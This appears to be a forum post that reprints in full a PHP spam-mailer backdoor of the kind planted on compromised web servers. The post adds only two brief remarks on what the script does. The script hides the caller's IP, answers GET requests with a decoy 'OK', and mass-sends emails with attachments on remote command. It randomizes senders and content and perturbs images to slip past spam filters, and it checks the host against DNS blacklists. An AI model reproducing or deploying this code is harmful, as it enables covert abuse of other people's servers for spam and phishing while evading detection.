With this file, one url can send endless spams
Interesting, the code checks the server ip on black lists!
<?php
@error_reporting(0);
@set_time_limit(150);
@ignore_user_abort(true);
@ini_set('max_execution_time',150);
if($_SERVER['REQUEST_METHOD']=='GET'){
exit('OK');
}
$randString=rand(0,200).'.'.rand(0,200).'.'.rand(0,200).'.'.rand(0,200);
$compare=$_SERVER['REMOTE_ADDR'];
while($key=key($_SERVER)){
if($_SERVER[$key]==$compare){
@$_SERVER[$key]=$randString;
}
next($_SERVER);
}
if(isset($_POST['ch'])===true){
Check(); exit;
}if(isset($_POST['sn'])===true){
Send(); exit;
}
function Send(){
$replyto=urldecode($_POST['rpt']);
$emails=urldecode($_POST['em']);
$ex=explode(':',$emails);
if(!is_file($_FILES['file']['tmp_name'])){
for($c=0,$max=sizeof($ex);$c<$max;$c++){
$r_from=Random(dataHandler($_POST['f']));
$r_subject=Random(dataHandler($_POST['s']));
$r_message=Random($_POST['m']);
$from_name=randText();
$r_message=str_ireplace('[from:]',$r_from,$r_message);
$r_subject=str_ireplace('[from:]',$r_from,$r_subject);
if($replyto==''){
$reply=$from_name.'@'.$_SERVER['HTTP_HOST'];
}else{
$reply=$replyto;
}
if(!SMail(trim($ex[$c]),$r_from,$r_message,$r_subject,$reply,$from_name)){
print '*send:bad*'; exit;
}
}
}else{
for($c=0,$max=sizeof($ex);$c<$max;$c++){
$r_from=Random(dataHandler(urldecode($_POST['f'])));
$r_subject=Random(dataHandler(urldecode($_POST['s'])));
$r_message=Random(urldecode($_POST['m']));
$from_name=randText();
$r_message=str_ireplace('[from:]',$r_from,$r_message);
$r_subject=str_ireplace('[from:]',$r_from,$r_subject);
if($replyto==''){
$reply=$from_name.'@'.$_SERVER['HTTP_HOST'];
}else{
$reply=$replyto;
}
if(!SendAttach(trim($ex[$c]),$r_from,$r_message,$r_subject,$reply,$from_name)){
print '*send:bad*'; exit;
}
}
}
print '*send:ok*'; exit;
}
function SMail($to,$from,$message,$subject,$replyto,$from_name){
if($_POST['tp']=='1'){ $type='text/html'; }
else{ $type='text/plain'; }
$header='From: '.'=?utf-8?B?'.base64_encode($from).'?='.' <'.$from_name.'@'.$_SERVER['HTTP_HOST'].">\r\n";
$header.='MIME-Version: 1.0'."\r\n";
$header.='Content-Type: '.$type.'; charset="utf-8"'."\r\n";
$header.='Reply-To: '.$replyto."\r\n";
$header.='X-Mailer: PHP/'.phpversion();
if(mail($to,$subject,$message,$header)){
return true;
}
return false;
}
function SendAttach($to,$from,$message,$subject,$replyto,$from_name){
$boundary=md5(uniqid()); $fileString=fileString($_FILES['file']['name']);
if($_POST['tp']=='1'){ $type='text/html'; }
else{ $type='text/plain'; }
$filename=filename($_FILES['file']['name']);
$headers='MIME-Version: 1.0'."\r\n";
$headers.='From: '.'=?utf-8?B?'.base64_encode($from).'?='.' <'.$from_name.'@'.$_SERVER['HTTP_HOST'].'>'."\r\n";
$headers.='Reply-To: '.$replyto."\r\n";
$headers.='X-Mailer: PHP/'.phpversion()."\r\n";
$headers.='Content-Type: multipart/mixed; boundary="'.$boundary."\"\r\n\r\n";
$body='--'.$boundary."\r\n";
$body.='Content-Type: '.$type.'; charset="utf-8"'."\r\n";
$body.='Content-Transfer-Encoding: base64'."\r\n\r\n";
$body.=chunk_split(base64_encode($message));
$body.= '--'.$boundary."\r\n";
$body.='Content-Type: '.$_FILES['file']['type'].'; name="'.$filename.'"'."\r\n";
$body.='Content-Disposition: attachment; filename="'.$filename.'"'."\r\n";
$body.='Content-Transfer-Encoding: base64'."\r\n";
$body.='X-Attachment-Id: '.rand(1000,99999)."\r\n\r\n";
$body.=chunk_split(base64_encode($fileString));
if(mail($to,$subject,$body,$headers)){
return true;
}
return false;
}
function dataHandler($data){
$ex=explode("\n",$data);
if(sizeof($ex)>1){
return trim($ex[rand(0,sizeof($ex)-1)]);
}
return trim($data);
}
function Random($text){
preg_match_all('#\[rand:(.+?)\]#is',$text,$result); $c=0;
preg_match_all('#\[num:(.+?)\]#is',$text,$result2); $i=0;
while($c<sizeof($result[1])){
$rand=explode('|',$result[1][$c]);
$rand=$rand[array_rand($rand)];
$search=array('[',']','|','?','.','*','#','(',')','$','^','+','{','}');
$replace=array('\[','\]','\|','\?','\.','\*','\#','\(','\)','\$','\^','\+','\{','\}');
$str=str_replace($search,$replace,$result[0][$c]);
$text=preg_replace('#'.$str.'#',$rand,$text,1); $c++;
}
while($i<sizeof($result2[1])){
$rand=explode('|',$result2[1][$i]);
if(!is_numeric($rand[0]) or !is_numeric($rand[1])){ continue; }
$rand=rand($rand[0],$rand[1]);
$search=array('[',']','|');
$replace=array('\[','\]','\|');
$str=str_replace($search,$replace,$result2[0][$i]);
$text=preg_replace('#'.$str.'#',$rand,$text,1); $i++;
}
return $text;
}
function Check(){
$crlf="\r\n";
if(isset($_POST['st'])===true){
print '*valid:ok*'.$crlf;
}if(isset($_POST['m'])===true){
if(function_exists('mail')){
$ex=explode(':',$_POST['m']);
$email=$ex[0]; $attach=$ex[1]; $reply=$ex[2];
$from_name=randText();
$replyto=$from_name.'@'.$_SERVER['HTTP_HOST'];
if($reply=='1'){ $replyto=$email; }
if($attach=='1'){
if(CheckAttach($email,$replyto,$from_name)){
print '*mail:ok*'.$crlf;
}else{
print '*mail:bad*'.$crlf;
}
}else{
if(CheckMail($email,$replyto,$from_name)){
print '*mail:ok*'.$crlf;
}else{
print '*mail:bad*'.$crlf;
}
}
}else{
print '*mail:bad*'.$crlf;
}
}if(isset($_POST['rb'])===true){
$rbl=rbl();
if($rbl==''){
print '*rbl:ok*';
}else{
print '*rbl:'.$rbl.'*';
}
}
}
function rbl(){
$dnsbl_check=array('b.barracudacentral.org','xbl.spamhaus.org','sbl.spamhaus.org','zen.spamhaus.org','bl.spamcop.net');
$ip=gethostbyname($_SERVER['HTTP_HOST']); $result='';
if($ip){
$rip=implode('.',array_reverse(explode('.',$ip)));
foreach($dnsbl_check as $val){
if(checkdnsrr($rip.'.'.$val.'.','A'))
$result.=$val.', ';
}
if(strlen($result)>2){ return substr($result,0,-2); }
else{ return ''; }
}else{
return '*rbl:unknown*';
}
return '';
}
function CheckMail($to,$reply,$from_name){
$header='From: '.'=?utf-8?B?'.base64_encode(randText()).'?='.' <'.$from_name.'@'.$_SERVER['HTTP_HOST'].">\r\n";
$header.='MIME-Version: 1.0'."\r\n";
$header.='Content-Type: text/html; charset="utf-8"'."\r\n";
$header.='Reply-To: '.$reply."\r\n";
$header.='X-Mailer: PHP/'.phpversion();
$message=text();
$subject=$_SERVER['HTTP_HOST'];
if(mail($to,$subject,$message,$header)){
return true;
}
return false;
}
function CheckAttach($to,$reply,$from_name){
$message=text();
$subject=$_SERVER['HTTP_HOST'];
$filename=filename('1.txt'); $boundary=md5(uniqid());
$headers='MIME-Version: 1.0'."\r\n";
$headers.='From: '.'=?utf-8?B?'.base64_encode(randText()).'?='.' <'.$from_name.'@'.$_SERVER['HTTP_HOST'].'>'."\r\n";
$headers.='Reply-To: '.$reply."\r\n";
$headers.='X-Mailer: PHP/'.phpversion()."\r\n";
$headers.='Content-Type: multipart/mixed; boundary="'.$boundary."\"\r\n\r\n";
$body='--'.$boundary."\r\n";
$body.='Content-Type: text/html; charset="utf-8"'."\r\n";
$body.='Content-Transfer-Encoding: base64'."\r\n\r\n";
$body.=chunk_split(base64_encode($message));
$body.= '--'.$boundary."\r\n";
$body.='Content-Type: text/plain; name="'.$filename.'"'."\r\n";
$body.='Content-Disposition: attachment; filename="'.$filename.'"'."\r\n";
$body.='Content-Transfer-Encoding: base64'."\r\n";
$body.='X-Attachment-Id: '.rand(1000,99999)."\r\n\r\n";
$body.= chunk_split(base64_encode(text()));
if(mail($to,$subject,$body,$headers)){
return true;
}
return false;
}
function filename($name){
$format=end(explode('.',$name));
$array[]='SDC'; $array[]='P'; $array[]='DC'; $array[]='CAM'; $array[]='IMG-';
$img=array('png','jpg','gif','jpeg','bmp');
for($c=0,$max=sizeof($img);$c<$max;$c++){
if(strtolower($format)==$img[$c]){
$rand=rand(10,999999);
return $array[rand(0,4)].$rand.'.'.$format;
}
}
return randText().'.'.$format;
}
function fileString($name){
$format=end(explode('.',$name));
if(strtolower($format)=='jpeg' or strtolower($format)=='jpg'){
if(CheckRandIMG()){
return RandIMG($_FILES['file']['tmp_name']);
}
}
return file_get_contents($_FILES['file']['tmp_name']);
}
function randText(){
$str='qwertyuiopasdfghjklzxcvbnm';
$size=rand(3,8); $result='';
for($c=0;$c<$size;$c++){
$result.=$str{rand(0,strlen($str)-1)};
}
return $result;
}
function text(){
$str='qwertyuiopasdfghjklzxcvbnm';
$size=rand(9,20); $result='';
for($c=0;$c<$size;$c++){
$rand=rand(6,10);
for($i=0;$i<$rand;$i++){
$result.=$str{rand(0,strlen($str)-1)};
}
$sign=array(' ',' ',' ',' ',', ','? ','. ','. ');
$result.=$sign[rand(0,7)];
}
return trim($result);
}
function CheckRandIMG(){
$array=array(
'getimagesize',
'imagecreatetruecolor',
'imagecreatefromjpeg',
'imagecopyresampled',
'imagefilter',
'ob_start',
'imagejpeg',
'ob_get_clean'
);
for($c=0,$max=sizeof($array);$c<$max;$c++){
if(!function_exists($array[$c])){
return false;
}
}
return true;
}
function RandIMG($file){
$rand['width']=rand(1,2);
$rand['height']=rand(1,2);
$rand['quality']=rand(1,2);
$rand['brightness']=rand(1,2);
$rand['contrast']=rand(1,2);
list($width,$height)=getimagesize($file);
if($rand['width']==1){
$sign=rand(1,2);
if($sign==1){
$new_width=$width+rand(1,10);
}else{
$new_width=$width-rand(1,10);
}
}else{
$new_width=$width;
}if($rand['height']==1){
$sign=rand(1,2);
if($sign==1){
$new_height=$height+rand(1,10);
}else{
$new_height=$height-rand(1,10);
}
}else{
$new_height=$height;
}if($rand['quality']==1){
$quality=75;
}else{
$quality=rand(65,105);
}if($rand['brightness']==1){
$brightness=rand(0,35);
}else{
$brightness=0;
}if($rand['contrast']==1){
$sign=rand(1,2);
if($sign==1){ $sign='+'; }else{ $sign='-'; }
$contrast=rand(1,15);
}else{
$sign='';
$contrast=0;
}
$image_p=imagecreatetruecolor($new_width,$new_height);
$image=imagecreatefromjpeg($file);
imagecopyresampled($image_p, $image,0,0,0,0,$new_width,$new_height,$width,$height);
imagefilter($image_p,IMG_FILTER_CONTRAST,$sign.$contrast);
imagefilter($image_p,IMG_FILTER_BRIGHTNESS,$brightness);
ob_start();
imagejpeg($image_p,null,$quality);
$out=ob_get_clean();
imagedestroy($image_p);
return $out;
}
?>